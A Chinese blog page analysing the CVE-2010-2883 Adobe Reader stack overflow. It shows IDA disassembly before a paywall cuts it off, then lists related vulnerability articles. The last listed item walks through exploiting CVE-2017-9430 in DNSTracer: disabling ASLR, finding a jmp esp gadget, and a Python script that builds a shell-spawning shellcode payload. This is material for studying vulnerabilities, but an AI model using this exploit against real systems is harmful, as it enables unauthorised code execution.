漏洞分析之CVE-2010-2883(栈溢出)

最新推荐文章于 2024-01-12 20:46:58 发布
原创 最新推荐文章于 2024-01-12 20:46:58 发布 · 3.5k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#栈溢出 #漏洞 #cve

本文详细分析了Adobe Acrobat和Reader中的CVE-2010-2883栈溢出漏洞,通过栈溢出、SING数据结构和Ollydbg动态调试,揭示了如何构造ROP链绕过DEP。利用heap spray技术和JavaScript脚本,最终实现漏洞验证。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

之前调过一个关于浏览器的漏洞,因为第一次接触漏洞,所以很没有经验不知道最后怎么构造shellcode(特别是ROP链的写法),有幸再调试一个稍微简单点的CVE,具体查看poc中的ROP链编写。

0x00 漏洞简介

Adobe Acrobat和Reader都是美国Adobe公司开发的非常流行的PDF文件阅读器。
基于Window和Mac OS X的Adobe Reader和Acrobat 9.4之前的9.x版本,8.2.5之前的8.x版本的CoolType.dll中存在基于栈的缓冲区溢出漏洞。远程攻击者可借助带有TTF字体Smart INdependent Glyphlets (SING)表格中超长字段的PDF文件执行任意代码或者导致拒绝服务(应用程序崩溃)。

0x01 测试环境

虚拟机 winxp sp3 32bit
adobe Reader 9.3.4

利用OD以及IDA进行动静态结合的逆向分析

0x02 漏洞调试

0x1 基于字符串定位的漏洞分析方法

首先进行漏洞定位,这是分析的起始步骤,找到漏洞产生的现场,作为一个典型的stack overflow的漏洞,最典型的函数就是Strcat函数,同时本漏洞出现的原因是在堆SING表格的解析上,所以我们可以直接利用IDA分析(CoolType.dll文件)定位漏洞所在位置,alt+t搜索SING字符
这里写图片描述
利用IDA静态查看出问题的CoolType.dll动态链接库

.text:0803DCF9                 push    ebp
.text:0803DCFA                 sub     esp, 104h;分配栈空间0x104
.text:0803DD00                 lea     ebp, [esp-4];后面的strcat会把执行结果保存在ebp中
.text:0803DD04                 mov     eax, dword_8230FB8
.text:0803DD09                 xor     eax, ebp
.text:0803DD0B                 mov     [ebp+104h], eax
.text:0803DD11                 push    4Ch
.text:0803DD13                 mov     eax, offset loc_8184A54
.text:0803DD18                 call    __EH_prolog3_catch
.text:0803DD1D                 mov     eax, [ebp+arg_C]
.text:0803DD23                 mov     edi, [ebp+arg_0]
.text:0803DD29                 mov     ebx, [ebp+arg_4]
.text:0803DD2F                 mov     [ebp+var_28], edi
.text:0803DD32                 mov     [ebp+var_30], eax
.text:0803DD35                 call    sub_804172C
.text:0803DD3A                 xor     esi, esi
.text:0803DD3C                 cmp     dword ptr [edi+8], 3
.text:0803DD40                 mov     [ebp+var_4], esi
.text:0803DD43                 jz      loc_803DF00
.text:0803DD49                 mov     [ebp+var_1C], esi
.text:0803DD4C                 mov     [ebp+var_18], esi
.text:0803DD4F                 cmp     dword ptr [edi+0Ch], 1
.text:0803DD53                 mov     byte ptr [ebp+var_4], 1
.text:0803DD57                 jnz     loc_803DEA9
.text:0803DD5D                 push    offset a
最低0.47元/天 解锁文章

200万优质内容无限畅学
CVE-2010-2883分析
wangtiankuo的博客
10-10 2685
1 漏洞背景 CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在栈溢出漏洞。 1.1 Heap Spray(堆喷) 使用堆喷的时候,会将EIP指向堆区的0x0C0C0C0C位置,然后用JavaScript申请大量内存,用包含着0x90和shellcode的“内存片”覆盖这些内存。 J...
漏洞复现-CVE-2010-2883
滕财然的博客
02-26 1713
CVE-2010-2883 Adobe Reader复现 1、漏洞原理 Adobe Reader 8.24-9.3.4的CoolType.dll库在解析字体文件SING表格中的uniqueName项时存在栈溢出漏洞,用户打开了特制的PDF文件可能导致执行恶意代码,可实现比如进行远程控制等。 2、漏洞分析 反汇编工具IDA: IDA 是全球最智能、功能最完善的交互式反汇编程序,许多软件安全专家和黑客...
CVE-2010-2883漏洞分析
weixin_46286477的博客
09-28 1220
CVE-2010-2883漏洞分析,从基础开始学习漏洞
栈溢出CVE复现分析CVE-2010-2883
weixin_40306105的博客
05-03 1046
1 实验环境 操作系统:XP SP3 调试器:OllyDbg 反汇编:IDA Pro 7.0 Adobe Reader : 9.3.4 2 漏洞背景 CVE-2010-2883是Adobe Reader和Acrobat中的CoolType.dll库在解析字体文件SING表中的uniqueName项时存在栈溢出漏洞。 3 实验内容 首先在系统中找到问题库文件,也就是xp sp3...
[漏洞战争]漏洞复现:CVE-2010-2883Adobe Reader TTF字体SING表栈溢出漏洞
m0_51246873的博客
01-12 1111
[漏洞战争]漏洞复现:CVE-2010-2883Adobe Reader TTF字体SING表栈溢出漏洞
Adobe Reader 缓冲区溢出漏洞CVE-2010-2883漏洞分析报告
m0_64973256的博客
01-20 1074
一.简介 软件名称:Adobe Reader 影响范围:7.0.0-9.3.4版本 影响平台:Windows 漏洞模块:CoolType.dll 威胁等级:高危 漏洞类型:缓冲区溢出 威胁路径:远程 机密性影响:完全的信息泄露导致所有系统文件暴露 完整性影响:系统完整性可被完全破坏 可用性影响:可能导致系统完全宕机 攻击复杂度:漏洞利用存在一定的访问条件 攻击向量:攻击者不需要获取内网访问权或本地访问权 身份认证:漏洞利用无需身份认证 二.软件介绍 Adobe Rea...
漏洞分析方法解析
weixin_34146986的博客
10-21 165
http://www.searchnetworking.com.cn/showcontent_39953.htm# 转载于:https://blog.51cto.com/fcinbj/408794
漏洞分析
Jack18812167102的博客
06-06 1231
2.1什么是漏洞 漏洞就是指区别于所有非受损状态的容易受攻击的状态特征。是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。 2.2漏洞形成 2.2.1后门 大型软件、系统的编写,是许多程序员共同完成。他们是将一个软件或系统分成若干板块,分工编写,然后再汇总,测试。最后,修补,发布。在软件汇总时,为了测试方便,程序员总会留有后门;在测试以后再进行修补……这些后门,如果一旦为某种目的故意留下,或是没有发现,软件发布后自然而然就成了漏洞。 2.2.2程.
软件漏洞分析技术(一)
AlanKSorata的博客
03-13 1042
PE (Portable Executable) 是 Win32平台下可执行文件遵守的数据格式。".exe"文件".dll"文件PE 文件格式把可执行文件分成若干个数据节(section),不同的资源被放在不同的节中。典型格式如下:.text 由编译器产生,存放着二进制的机器代码,也是我们反汇编和调试的对象。.data 初始化的数据块,如宏定义、全局变量、静态变量等。.idata 可执行文件所使用的动态链接库等外来函数与文件的信息....
漏洞挖掘的类型与分析方法
10-14
漏洞挖掘的类型与分析方法,介绍了常用的漏洞分类方法与漏洞分析技术
三位一体的漏洞分析方法-web应用安全测试方法
swordheart的博客
04-24 305
0x00 前言 节选自: http://www.owasp.org.cn/OWASP_Conference/owasp-20140924/02OWASPWeb20140915.pdf 4.1 主动式(全自动 ):Web2.0、交互式漏洞扫描 4.2 半自动式漏洞分析:业务重放、url镜像,实现高覆盖度 4.3 被动式漏洞分析:应对0Day和孤岛页面 0x01 主动式(全自动 )Web扫描 • 使用常见的漏洞扫描器 • 自动fuzz,填充各种攻击性数据 • 业务逻辑混淆,导致服务出错...
CVE-2010-2883字体文件SING表栈溢出
andy7002的博客
07-03 916
0x00 漏洞概述 Adobe Acrobat和Reader都是美国Adobe公司开发的非常流行的PDF文件阅读器。基于Window和Mac OS X的Adobe Reader和Acrobat 9.4之前的9.x版本,8.2.5之前的8.x版本的CoolType.dll中使用了不安全的字符串拼接函数strcat, 导致栈的缓冲区溢出。远程攻击者可借助带有TTF字体Smart INdepend
漏洞挖掘分析技术总结
weixin_30568591的博客
03-22 1126
漏洞挖掘分析技术有多种,只应用一种漏洞挖掘技术,是很难完成分析工作的,一般是将几种漏洞挖掘技术优化组合,寻求效率和质量的均衡。2.1.人工分析人工分析是一种灰盒分析技术。针对被分析目标程序,手工构造特殊输入条件,观察输出、目标状态变化等,获得漏洞分析技术。输入包括有效的和无效的输入,输出包括正常输出和非正常输出。非正常输出是漏洞出现的前提,或者就是目标程序的漏洞。非正常目标状态的变化也是发现漏洞...
CVE-2013-2028 经典栈溢出漏洞复现资料整理
^_^
10-25 2857
一个经典的由整数溢出导致栈溢出漏洞。下面感觉写的有点乱。 文章目录复现漏洞相关基础知识CVE-2013-2028原理安装漏洞环境ubuntu 安装docker安装metasploit框架触发漏洞网站上现有的exp 复现漏洞 CVE-2013-2028:nginx 栈溢出漏洞 相关基础知识 栈的基础知识:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/stack-intro-zh/ 栈溢出原理:https://ctf-wik
绿盟科技网络安全威胁周报2017.06 Adobe Acrobat Reader又爆出一堆高危漏洞
weixin_34082789的博客
09-01 394
绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-02,绿盟科技漏洞库本周新增60条,其中高危37条,其中Adobe Acrobat Reader的高危漏洞又是一堆。 互联网安全态势 CVE统计 最近一周CVE公告总数与前期相比。值得关注的高危漏洞如下: 威胁热点信息回顾 英特尔CPU芯片故障 http://toutiao.secj...
栈溢出漏洞
Civit_的博客
03-27 324
CPU在执行call指令时,会先将当前call指令的下一条指令的地址入栈,再跳转到被调用函数。编译器会始终保证即使子函数使用了栈并修改了栈顶的位置,也会在函数返回前将栈顶恢复到刚进入函数时候的状态,从而保证取到的返回地址不会出错。Canary保护机制是,通过在栈保存rbp的位置前插入一段随机数,这样如果攻击者利用栈溢出漏洞覆盖返回地址,也会把Canary一起覆盖。​ 栈(stack)是一种简单且经典的数据结构,最主要的特点是使用先进后出(FILO)的方式存取栈中的数据。栈溢出是缓冲区溢出的一种。
ark笔记
kernweak的博客
07-03 4276
ark相关技术是关于进程检测,杀进程,线程检测,杀线程,怎么检测模块,隐藏dll等。还有驱动模块怎么检测,怎么卸载别人的驱动。SSDT,shadowSSDT,FSD相关。 进程 进程枚举 R3枚举进程 CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS)/Process32First/Process32Next,建一个快照,然后去遍历 ZwQueryS...
Windows内存漏洞——栈溢出漏洞及其利用分析
theglasssky的博客
05-25 1040
windows系统中内存漏洞中关于栈溢出的部分
CVE-2017-9430(栈溢出漏洞)复现
最新发布
06-19
### CVE-2017-9430 栈溢出漏洞复现步骤 CVE-2017-9430 是 DNSTracer 1.9 中的一个栈溢出漏洞,该漏洞允许攻击者通过精心构造的输入数据覆盖返回地址并执行任意代码。以下是复现此漏洞的详细过程: #### 1. 环境搭建 为了成功复现 CVE-2017-9430 漏洞,需要准备以下环境: - 安装目标程序 DNSTracer 1.9。 - 使用支持调试和逆向工程的工具,例如 GDB 或 Radare2。 - 确保目标系统禁用了 ASLR(地址空间布局随机化)或绕过 ASLR。 在 Linux 系统中,可以通过以下命令禁用 ASLR: ```bash echo 0 > /proc/sys/kernel/randomize_va_space ``` #### 2. 分析漏洞成因 DNSTracer 1.9 在处理用户输入时未对缓冲区大小进行严格检查,导致可以利用超长字符串触发栈溢出。具体来说,`sscanf` 函数被用于解析输入数据,但没有验证输入长度,从而可能导致栈缓冲区被覆盖[^2]。 #### 3. 利用方法 一种常见的利用方法是通过覆盖返回地址为 `jmp esp` 指令的地址,从而使程序跳转到 shellcode 执行。以下是具体步骤: - **寻找 `jmp esp` 指令** 使用 `objdump` 工具查找目标程序中的 `jmp esp` 指令。例如: ```bash objdump -M intel -D /usr/local/bin/dnstracer | grep jmp | grep esp ``` 这将输出类似以下的结果: ``` 08048e5c: ff e4 jmp esp ``` - **构造 payload** 构造 payload 的关键在于确保覆盖返回地址为 `jmp esp` 指令的地址,并在其后附加 shellcode。例如: ```python #!/usr/bin/python import struct # Shellcode (example) shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80") # Padding to reach return address padding = "A" * 260 # Address of jmp esp (little-endian format) ret_address = struct.pack("<I", 0x08048e5c) # Construct the payload payload = padding + ret_address + shellcode # Write to file for testing with open("payload.txt", "w") as f: f.write(payload) ``` #### 4. 测试与验证 将生成的 payload 输入到 DNSTracer 中进行测试。如果配置正确,程序应跳转到 shellcode 并执行相应操作。 --- ### 注意事项 - 确保实验环境隔离,避免对生产系统造成影响。 - 如果启用了 ASLR,可能需要使用信息泄露技术或其他方法定位返回地址[^2]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值